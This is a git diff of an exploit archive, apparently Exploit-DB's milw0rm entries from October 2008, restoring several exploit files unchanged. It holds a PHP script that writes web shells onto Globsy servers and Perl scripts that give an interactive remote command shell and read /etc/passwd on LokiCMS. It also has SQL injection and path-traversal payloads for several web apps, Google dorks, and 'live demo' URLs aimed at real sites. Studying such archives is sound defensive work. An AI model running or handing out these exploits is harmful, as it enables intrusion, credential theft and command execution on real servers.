-$data .= "Connection: close\r\n\r\n";
-$data .= $post;
-
-if(!fputs($sock,$data)) die("[?] Fputs Error!\n");
-
-while(!feof($sock)) 
-{
-  $content .= fgets($sock);
-} fclose($sock); 
-
-if(!strpos('File data saved OK',$content))
-{
-  echo "[?] Exploit Successfully!\r\n";
-  echo "[?] $array[$exec] written in $file\r\n";
-}
-else
-{
-  echo "[?] Exploit Failed!\r\n";
-  exit;
-}
-  
-  
-?>
-
-# milw0rm.com [2008-10-12]
+#!/usr/bin/php -q
+'".$filename."' could not be opened.");
+39. fwrite($handle, $data) or die("Write: The file '".$filename."' could not be writen.");    
+   
+   $mode is $_POST['mode'] and $data = $_POST['data']
+   
+   so you can rewrite (or create) any file 
+    
+*/
+
+
+error_reporting(0);
+ini_set("default_socket_timeout",5);
+
+$host = str_replace('http:\/\/',null,$argv[1]);
+$path = $argv[2]."/globsy_edit.php?file=";
+$file = $argv[3];
+$exec = intval($argv[4]);
+
+if($exec == 8)
+{
+  $input = stripslashes(trim(fgets(STDIN)));
+}
+else
+{
+  $input = "Write your code\r\n";
+}
+
+
+$array = array(
+               'include($_GET["input"]);',
+               'exec($_GET["input");',
+               'eval($_GET["input");',
+               'file_get_contents($_GET["input"]);',
+               'phpinfo();',
+               'system($_GET["input");',
+               'shell_exec($_GET["input");',
+               'echo $_GET["input");',
+                $input
+              );
+
+if($argc != 5)
+{
+  echo "[?] Globsy <= 1.0 Remote File Rewriting Exploit\r\n";
+  echo "[?] Usage: php $argv[0] [host] [path] [file] [option]\r\n\r\n";
+  echo "[?] Options: \r\n";
+ 
+  for($i=0;$i<=count($array)-1;$i++)
+  {
+    echo "-$i $array[$i]\r\n";
+  }  
+    return exit;
+} 
+
+if(!$sock = fsockopen($host,80)) die("[?] Socket Error\r\n");
+
+$path .= $file;
+$post .= "mode=save&data=";
+$data .= "POST /$path HTTP/1.1\r\n";
+$data .= "Host: $host\r\n";
+$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
+$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$data .= "Accept-Encoding: text/plain\r\n";
+$data .= "Content-Length: ".strlen($post)."\r\n";
+$data .= "Connection: close\r\n\r\n";
+$data .= $post;
+
+if(!fputs($sock,$data)) die("[?] Fputs Error!\n");
+
+while(!feof($sock)) 
+{
+  $content .= fgets($sock);
+} fclose($sock); 
+
+if(!strpos('File data saved OK',$content))
+{
+  echo "[?] Exploit Successfully!\r\n";
+  echo "[?] $array[$exec] written in $file\r\n";
+}
+else
+{
+  echo "[?] Exploit Failed!\r\n";
+  exit;
+}
+  
+  
+?>
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6736.txt b/platforms/php/webapps/6736.txt
index 749aff565..ce53ff134 100755
--- a/platforms/php/webapps/6736.txt
+++ b/platforms/php/webapps/6736.txt
@@ -1,29 +1,29 @@
-###############################################################################################
-# Author : EgY Coders TM < Hakxer>
-# Home : Www.educ-up.com
-# Type Gap : SQL INJECTION
-# script : Real-Estate-Scripts [see script] http://www.real-estate-scripts.com/demo.html
-# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk
-#################################################################################################
-####### [+] Bug in : index.php 
-### POC
-      http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+@@version,2,3/*
-	  http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+user(),2,3/*
-### Exploit
-         [+] Get User 
-# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+admin_email,2,3+from+ovi_anuntgratis.class_settings/*
-         [+] Get Database Name
-# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+database(),2,3/*
-
-# [+] HaVe Fun .. ;
-
-
-###############################################################################
-
--------------------------------- The End of Gap -----------------------------------
-
-## Contact : aq5@windowslive.com
-### Muslim Hacker .. I love you Mohammed Rasull Allah 
-######################################################
-
-# milw0rm.com [2008-10-12]
+###############################################################################################
+# Author : EgY Coders TM < Hakxer>
+# Home : Www.educ-up.com
+# Type Gap : SQL INJECTION
+# script : Real-Estate-Scripts [see script] http://www.real-estate-scripts.com/demo.html
+# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk
+#################################################################################################
+####### [+] Bug in : index.php 
+### POC
+      http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+@@version,2,3/*
+	  http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+user(),2,3/*
+### Exploit
+         [+] Get User 
+# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+admin_email,2,3+from+ovi_anuntgratis.class_settings/*
+         [+] Get Database Name
+# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+database(),2,3/*
+
+# [+] HaVe Fun .. ;
+
+
+###############################################################################
+
+-------------------------------- The End of Gap -----------------------------------
+
+## Contact : aq5@windowslive.com
+### Muslim Hacker .. I love you Mohammed Rasull Allah 
+######################################################
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6737.txt b/platforms/php/webapps/6737.txt
index ed045f441..1051dd83a 100755
--- a/platforms/php/webapps/6737.txt
+++ b/platforms/php/webapps/6737.txt
@@ -1,120 +1,120 @@
-# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
-# url: http://www.lokicms.com/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: All Hackers and milw0rm website
-
-vulnerability:
-The vulnerability allows to verify the existence of the files and directories around the server.
-/etc/passwd (example)
-
-vuln file: index.php
-vuln code:
-------------------------------------------------
-if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) );
-
-
-
-// load the page
-
-if ($pagename == '') {
-
-	$name = $c_default;
-
-	$nosimple = true;
-
-} else {
-
-	$name = $pagename;
-
-};
-
-
-
-if ($c_simplelink == true && $nosimple != true) {
-
-	$content = findpage($name);
-
-	if ($content == "") {$content = $c_default;};
-
-} else {
-
-	$content = $name;
-
-};
-
-
-
-// stupid fix due to subdomain problems
-
-if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . $content) == false) {$content = $c_default;};};
-
-
-
-// load the menu
-
-$menu = getmenu($content, $c_modrewrite, $c_simplelink);
-
-
-
-$content = parsepage($content);
-------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-sub lw
-{
-
-my $SO = $^O;
-my $linux = "";
-if (index(lc($SO),"win")!=-1){
-		   $linux="0";
-	    }else{
-		    $linux="1";
-	    }
-		if($linux){
-system("clear");
-}
-else{
-system("cls");
-}
-
-}
-
-&lw;
-
-print "#################################################################\n";
-print "#  LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit  #\n";
-print "#################################################################\n";
-
-my $victim = $ARGV[0];
-my $file = $ARGV[1];
-
- if((!$ARGV[0]) && (!$ARGV[1])) {
-    print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n";
-    print "[x] written by JosS - sys-project[at]hotmail.com\n";
-    print "[x] usage: perl xpl.pl [host] [file]\n";
-    print "[x] example: http://localhost/loki/ /includes/Config.php\n\n";
-    exit(1);
- }
- 
-    print "\n[+] connecting: $victim\n";
-    my $cnx = LWP::UserAgent->new() or die;
-    my $go=$cnx->get($victim."index.php?page=../$file");
-    if ($go->content =~ m/LokiCMS/ms) {
-        print "[-] The file not exist\n\n";
-    } else {
-        print "[!] The file exist: $file\n\n";
-    }
-
-# live demo: http://demo.opensourcecms.com/lokicms/
-
-# milw0rm.com [2008-10-12]
+# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
+# url: http://www.lokicms.com/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: All Hackers and milw0rm website
+
+vulnerability:
+The vulnerability allows to verify the existence of the files and directories around the server.
+/etc/passwd (example)
+
+vuln file: index.php
+vuln code:
+------------------------------------------------
+if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) );
+
+
+
+// load the page
+
+if ($pagename == '') {
+
+	$name = $c_default;
+
+	$nosimple = true;
+
+} else {
+
+	$name = $pagename;
+
+};
+
+
+
+if ($c_simplelink == true && $nosimple != true) {
+
+	$content = findpage($name);
+
+	if ($content == "") {$content = $c_default;};
+
+} else {
+
+	$content = $name;
+
+};
+
+
+
+// stupid fix due to subdomain problems
+
+if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . $content) == false) {$content = $c_default;};};
+
+
+
+// load the menu
+
+$menu = getmenu($content, $c_modrewrite, $c_simplelink);
+
+
+
+$content = parsepage($content);
+------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+sub lw
+{
+
+my $SO = $^O;
+my $linux = "";
+if (index(lc($SO),"win")!=-1){
+		   $linux="0";
+	    }else{
+		    $linux="1";
+	    }
+		if($linux){
+system("clear");
+}
+else{
+system("cls");
+}
+
+}
+
+&lw;
+
+print "#################################################################\n";
+print "#  LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit  #\n";
+print "#################################################################\n";
+
+my $victim = $ARGV[0];
+my $file = $ARGV[1];
+
+ if((!$ARGV[0]) && (!$ARGV[1])) {
+    print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n";
+    print "[x] written by JosS - sys-project[at]hotmail.com\n";
+    print "[x] usage: perl xpl.pl [host] [file]\n";
+    print "[x] example: http://localhost/loki/ /includes/Config.php\n\n";
+    exit(1);
+ }
+ 
+    print "\n[+] connecting: $victim\n";
+    my $cnx = LWP::UserAgent->new() or die;
+    my $go=$cnx->get($victim."index.php?page=../$file");
+    if ($go->content =~ m/LokiCMS/ms) {
+        print "[-] The file not exist\n\n";
+    } else {
+        print "[!] The file exist: $file\n\n";
+    }
+
+# live demo: http://demo.opensourcecms.com/lokicms/
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6739.txt b/platforms/php/webapps/6739.txt
index 352b75816..e058a8201 100755
--- a/platforms/php/webapps/6739.txt
+++ b/platforms/php/webapps/6739.txt
@@ -1,56 +1,56 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability 
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-$ Program: NewLife Blogger
-$ Version: <= 3.0
-$ File affected: system/nlb_user.class.php
-$ Download: http://sourceforge.net/projects/nlb/
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-
-Cookie format is:
-nlb3=7::96e79218965eb72c92a549dd5a330112
-nlb3=iduser::md5 pass
-
---Bug --
-
-143.	function checkLogin( ) {
-144.		// loing check
-145.		if( isset( $_COOKIE['nlb3'] ) ) {
-146.			$data = explode( '::', $_COOKIE['nlb3'] );
-147.			$id = $data[0];
-148.			$pass = $data[1];
-149.			$fromdb = $this->sql->getArray('SELECT password FROM ' . db_users . ' WHERE user_id = ' . $id . ' LIMIT 1;');
-150.			if( $pass === $fromdb['password'] ) {
-151.				$this->setid( $id );
-152.				$this->isLogedIn = true;
-153.			} else {
-154.				$this->isLogedIn = false;
-155.			}
-156.		}
-157.		// we also check for banned users
-158.		$this->checkBanned();
-159.	}
-
-
--- Exploit --
-
-True/false method to blind mysql injection. Examples:
-
-javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112"
-Response: You appears as logged in
-
-javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112"
-Response: You appears as not logged in
-
-javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112
-Response: You appears as logged in if MySQL version is 4
-
-javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112
-Response: You appears as logged in if MySQL version is 5
-
-# milw0rm.com [2008-10-12]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability 
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+$ Program: NewLife Blogger
+$ Version: <= 3.0
+$ File affected: system/nlb_user.class.php
+$ Download: http://sourceforge.net/projects/nlb/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+
+Cookie format is:
+nlb3=7::96e79218965eb72c92a549dd5a330112
+nlb3=iduser::md5 pass
+
+--Bug --
+
+143.	function checkLogin( ) {
+144.		// loing check
+145.		if( isset( $_COOKIE['nlb3'] ) ) {
+146.			$data = explode( '::', $_COOKIE['nlb3'] );
+147.			$id = $data[0];
+148.			$pass = $data[1];
+149.			$fromdb = $this->sql->getArray('SELECT password FROM ' . db_users . ' WHERE user_id = ' . $id . ' LIMIT 1;');
+150.			if( $pass === $fromdb['password'] ) {
+151.				$this->setid( $id );
+152.				$this->isLogedIn = true;
+153.			} else {
+154.				$this->isLogedIn = false;
+155.			}
+156.		}
+157.		// we also check for banned users
+158.		$this->checkBanned();
+159.	}
+
+
+-- Exploit --
+
+True/false method to blind mysql injection. Examples:
+
+javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112"
+Response: You appears as logged in
+
+javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112"
+Response: You appears as not logged in
+
+javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112
+Response: You appears as logged in if MySQL version is 4
+
+javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112
+Response: You appears as logged in if MySQL version is 5
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6740.txt b/platforms/php/webapps/6740.txt
index 9d4f2829e..cbcc74427 100755
--- a/platforms/php/webapps/6740.txt
+++ b/platforms/php/webapps/6740.txt
@@ -1,31 +1,31 @@
-# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
-# url: http://sourceforge.net/projects/myphpindexer/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
------------------------------------------------
-Depending the server configuration is possible 
-that it doesn't allow us to scale directories.
------------------------------------------------
-
-vuln file: index.php
-
-PoC:     /index.php?d=[DIR]&f=[FILE]
-Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd
-         /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd
-
-live demo:
-[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f)
-[FILE] = index.php;
-http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php
-
-dork:     "Powered by My PHP Indexer 1.0"
-dork (2): "priv8 :P"
-
-# milw0rm.com [2008-10-12]
+# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
+# url: http://sourceforge.net/projects/myphpindexer/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+-----------------------------------------------
+Depending the server configuration is possible 
+that it doesn't allow us to scale directories.
+-----------------------------------------------
+
+vuln file: index.php
+
+PoC:     /index.php?d=[DIR]&f=[FILE]
+Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd
+         /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd
+
+live demo:
+[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f)
+[FILE] = index.php;
+http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php
+
+dork:     "Powered by My PHP Indexer 1.0"
+dork (2): "priv8 :P"
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6743.pl b/platforms/php/webapps/6743.pl
index 3aa0a07bf..7fa8cacfc 100755
--- a/platforms/php/webapps/6743.pl
+++ b/platforms/php/webapps/6743.pl
@@ -1,73 +1,73 @@
-# Author:    __GiReX__	
-# Homepage:  http://girex.altervista.org
-
-# CMS:       LokiCMS 0.3.4
-# URL:       http://www.lokicms.com/
-
-# Description:  LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408)
-# The exploit changed becouse the vars changed but the bugged function is the same: writeconfig()
-# LokiCMS does not check the access to admin.php via POST...
-
-#!/usr/bin/perl -w
-# LokiCMS <= 0.3.4 Remote Command Execution Exploit
-# Needs with magic_quotes_gpc = Off
-# Coded by __GiReX__
-
-use LWP::UserAgent;
-
-if(not defined $ARGV[0])
-{
-     banner();
-     print "[-] Usage: perl $0 [host] [path]\n";
-     print "[-] Example: perl $0 localhost /lokicms/\n\n";
-     exit;
-}
-
-my $lwp = new LWP::UserAgent or die;
- 
-my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
-   $target .=  $ARGV[1] unless not defined $ARGV[1];
-   $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/;
-
-banner();
-my $res = $lwp->post($target.'admin.php', 
-                                [ 'LokiACTION' =>  'A_SAVE_G_SETTINGS',
-                                  'title'      =>  "';echo \"\";if(strlen(\$_SERVER['HTTP_CMD']))".
-                                                   "passthru(\$_SERVER['HTTP_CMD']);//", 
-                                  'language'   =>  'english-utf-8',
-                                  'theme'      =>  'default' ]);
-
-if($res->is_error)
-{
-    print "[-] Request mistake. Exploit terminated!\n";
-    exit ();
-}
-							  
-while(1)
-{
-    print "[+] shell:~\$ ";
-    chomp($cmd = );
-    last if $cmd eq 'exit';
-     
-    $lwp->default_header( 'CMD' => $cmd );
-    my $res = $lwp->get($target.'includes/Config.php');
-	 
-    if($res->is_success and $res->content =~ /INFECTED/)
-    {
-        print "\n". substr($res->content, index($res->content, 'INFECTED') + 12)."\n";
-    }
-    else
-    {
-        print "[-] PHP Code not injected. maybe magic_quotes_gpc = On!\n";
-        last;
-    }
-}
-
-sub banner
-{
-     print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit\n";
-     print "[+] Coded by __GiReX__\n";
-     print "\n";
-}
-
-# milw0rm.com [2008-10-13]
+# Author:    __GiReX__	
+# Homepage:  http://girex.altervista.org
+
+# CMS:       LokiCMS 0.3.4
+# URL:       http://www.lokicms.com/
+
+# Description:  LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408)
+# The exploit changed becouse the vars changed but the bugged function is the same: writeconfig()
+# LokiCMS does not check the access to admin.php via POST...
+
+#!/usr/bin/perl -w
+# LokiCMS <= 0.3.4 Remote Command Execution Exploit
+# Needs with magic_quotes_gpc = Off
+# Coded by __GiReX__
+
+use LWP::UserAgent;
+
+if(not defined $ARGV[0])
+{
+     banner();
+     print "[-] Usage: perl $0 [host] [path]\n";
+     print "[-] Example: perl $0 localhost /lokicms/\n\n";
+     exit;
+}
+
+my $lwp = new LWP::UserAgent or die;
+ 
+my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
+   $target .=  $ARGV[1] unless not defined $ARGV[1];
+   $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/;
+
+banner();
+my $res = $lwp->post($target.'admin.php', 
+                                [ 'LokiACTION' =>  'A_SAVE_G_SETTINGS',
+                                  'title'      =>  "';echo \"\";if(strlen(\$_SERVER['HTTP_CMD']))".
+                                                   "passthru(\$_SERVER['HTTP_CMD']);//", 
+                                  'language'   =>  'english-utf-8',
+                                  'theme'      =>  'default' ]);
+
+if($res->is_error)
+{
+    print "[-] Request mistake. Exploit terminated!\n";
+    exit ();
+}
+							  
+while(1)
+{
+    print "[+] shell:~\$ ";
+    chomp($cmd = );
+    last if $cmd eq 'exit';
+     
+    $lwp->default_header( 'CMD' => $cmd );
+    my $res = $lwp->get($target.'includes/Config.php');
+	 
+    if($res->is_success and $res->content =~ /INFECTED/)
+    {
+        print "\n". substr($res->content, index($res->content, 'INFECTED') + 12)."\n";
+    }
+    else
+    {
+        print "[-] PHP Code not injected. maybe magic_quotes_gpc = On!\n";
+        last;
+    }
+}
+
+sub banner
+{
+     print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit\n";
+     print "[+] Coded by __GiReX__\n";
+     print "\n";
+}
+
+# milw0rm.com [2008-10-13]
diff --git a/platforms/php/webapps/6744.txt b/platforms/php/webapps/6744.txt
index 266acc946..e393d98b9 100755
--- a/platforms/php/webapps/6744.txt
+++ b/platforms/php/webapps/6744.txt
@@ -1,71 +1,71 @@
-# LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit
-# url: http://www.lokicms.com/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: All Hackers and milw0rm website
-#
-# *Requirements: magic_quotes_gpc = Off
-
------------------------------------------------------------
-I had one idea when i saw http://milw0rm.com/exploits/6743
-I created the exploit that creates LFI.
------------------------------------------------------------
-
-vuln file: admin.php
-vuln code:
-
-		case 'A_SAVE_G_SETTINGS': //save main settings
-			writeconfig ( $c_password, $_POST['title'], $_POST['header'], $_POST['tagline'], $_POST
-['footnote'], $c_default, $_POST['theme'], $_POST['language'], $_POST['modrewrite'], $_POST['simplelink'], $_POST
-['code'] );
-  			$c_theme = $_POST['theme'];
-			include PATH . '/includes/Config.php';
-			include PATH . '/languages/' . $c_lang . '.lang.php'; --------> FUCKING THIS INCLUDE!!!!
-			$msg = $lang ['admin'] ['expressionSettingsSaved'];
-	         break;
-
---------
-Exploit:
---------
-
-use LWP::UserAgent;
-
-unless ($ARGV[0] && $ARGV[1])
-{
-    print "\n[x] LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit\n";
-    print "[x] written by JosS - sys-project[at]hotmail.com\n";
-    print "[x] usage: perl $0 [host] [path]\n";
-    print "[x] example: perl $0 localhost /lokicms/ \n\n";
-    exit(1);
-}
-
-my $lwp = new LWP::UserAgent or die;
- 
-my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
-   $target .=  $ARGV[1] unless not defined $ARGV[1];
-   $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/;
-
-my $res = $lwp->post($target.'admin.php', 
-                                [ 'LokiACTION' =>  'A_SAVE_G_SETTINGS',
-                                  'language'   =>  '../../../../../../../../../../etc/passwd%00']);
-
-if($res->is_error)
-{
-    print "[-] Exploit failed!\n";
-    exit ();
-}
-
---------
-
-ENTERS ADMIN.PHP TO SEE /ETC/PASSWD
-
-Ingenious work :D
-
-# milw0rm.com [2008-10-13]
+# LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit
+# url: http://www.lokicms.com/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: All Hackers and milw0rm website
+#
+# *Requirements: magic_quotes_gpc = Off
+
+-----------------------------------------------------------
+I had one idea when i saw http://milw0rm.com/exploits/6743
+I created the exploit that creates LFI.
+-----------------------------------------------------------
+
+vuln file: admin.php
+vuln code:
+
+		case 'A_SAVE_G_SETTINGS': //save main settings
+			writeconfig ( $c_password, $_POST['title'], $_POST['header'], $_POST['tagline'], $_POST
+['footnote'], $c_default, $_POST['theme'], $_POST['language'], $_POST['modrewrite'], $_POST['simplelink'], $_POST
+['code'] );
+  			$c_theme = $_POST['theme'];
+			include PATH . '/includes/Config.php';
+			include PATH . '/languages/' . $c_lang . '.lang.php'; --------> FUCKING THIS INCLUDE!!!!
+			$msg = $lang ['admin'] ['expressionSettingsSaved'];
+	         break;
+
+--------
+Exploit:
+--------
+
+use LWP::UserAgent;
+
+unless ($ARGV[0] && $ARGV[1])
+{
+    print "\n[x] LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit\n";
+    print "[x] written by JosS - sys-project[at]hotmail.com\n";
+    print "[x] usage: perl $0 [host] [path]\n";
+    print "[x] example: perl $0 localhost /lokicms/ \n\n";
+    exit(1);
+}
+
+my $lwp = new LWP::UserAgent or die;
+ 
+my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
+   $target .=  $ARGV[1] unless not defined $ARGV[1];
+   $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/;
+
+my $res = $lwp->post($target.'admin.php', 
+                                [ 'LokiACTION' =>  'A_SAVE_G_SETTINGS',
+                                  'language'   =>  '../../../../../../../../../../etc/passwd%00']);
+
+if($res->is_error)
+{
+    print "[-] Exploit failed!\n";
+    exit ();
+}
+
+--------
+
+ENTERS ADMIN.PHP TO SEE /ETC/PASSWD
+
+Ingenious work :D
+
+# milw0rm.com [2008-10-13]
diff --git a/platforms/php/webapps/6745.txt b/platforms/php/webapps/6745.txt
index 6e08ba2fd..ed624bc33 100755
--- a/platforms/php/webapps/6745.txt
+++ b/platforms/php/webapps/6745.txt
@@ -1,45 +1,45 @@
-|___________________________________________________|
-|
-| ParsBlogger  (links.asp id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                     |
-|
-| script : http://www.parsblogger.com/demo.htm
-|
-| DorK   : "  ParsBlogger  ? 2006. All rights reserved"
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--
-
-Demo
-
-http://www.shahedblog.com/blog/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-10-13]
+|___________________________________________________|
+|
+| ParsBlogger  (links.asp id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                     |
+|
+| script : http://www.parsblogger.com/demo.htm
+|
+| DorK   : "  ParsBlogger  ? 2006. All rights reserved"
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--
+
+Demo
+
+http://www.shahedblog.com/blog/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-10-13]
diff --git a/platforms/php/webapps/6746.txt b/platforms/php/webapps/6746.txt
index 7382fb3c5..3c06a01b6 100755
--- a/platforms/php/webapps/6746.txt
+++ b/platforms/php/webapps/6746.txt
@@ -1,37 +1,37 @@
-[~]-------------------------------------------------------------------------------------------------------------
-[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
-[~]
-[~] http://www.indexscript.com/download.php
-[~]    
-[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.]
-[~] ------------------------------------------------------------------------------------------------------------
-[~] Bug founded by d3v1l   [Avram Marius]
-[~]
-[~] Date: 12.10.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com    http://security-sh3ll.com
-[~]
-[~] ------------------------------------------------------------------------------------------------------------
-[~] Greetz tO ALL:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
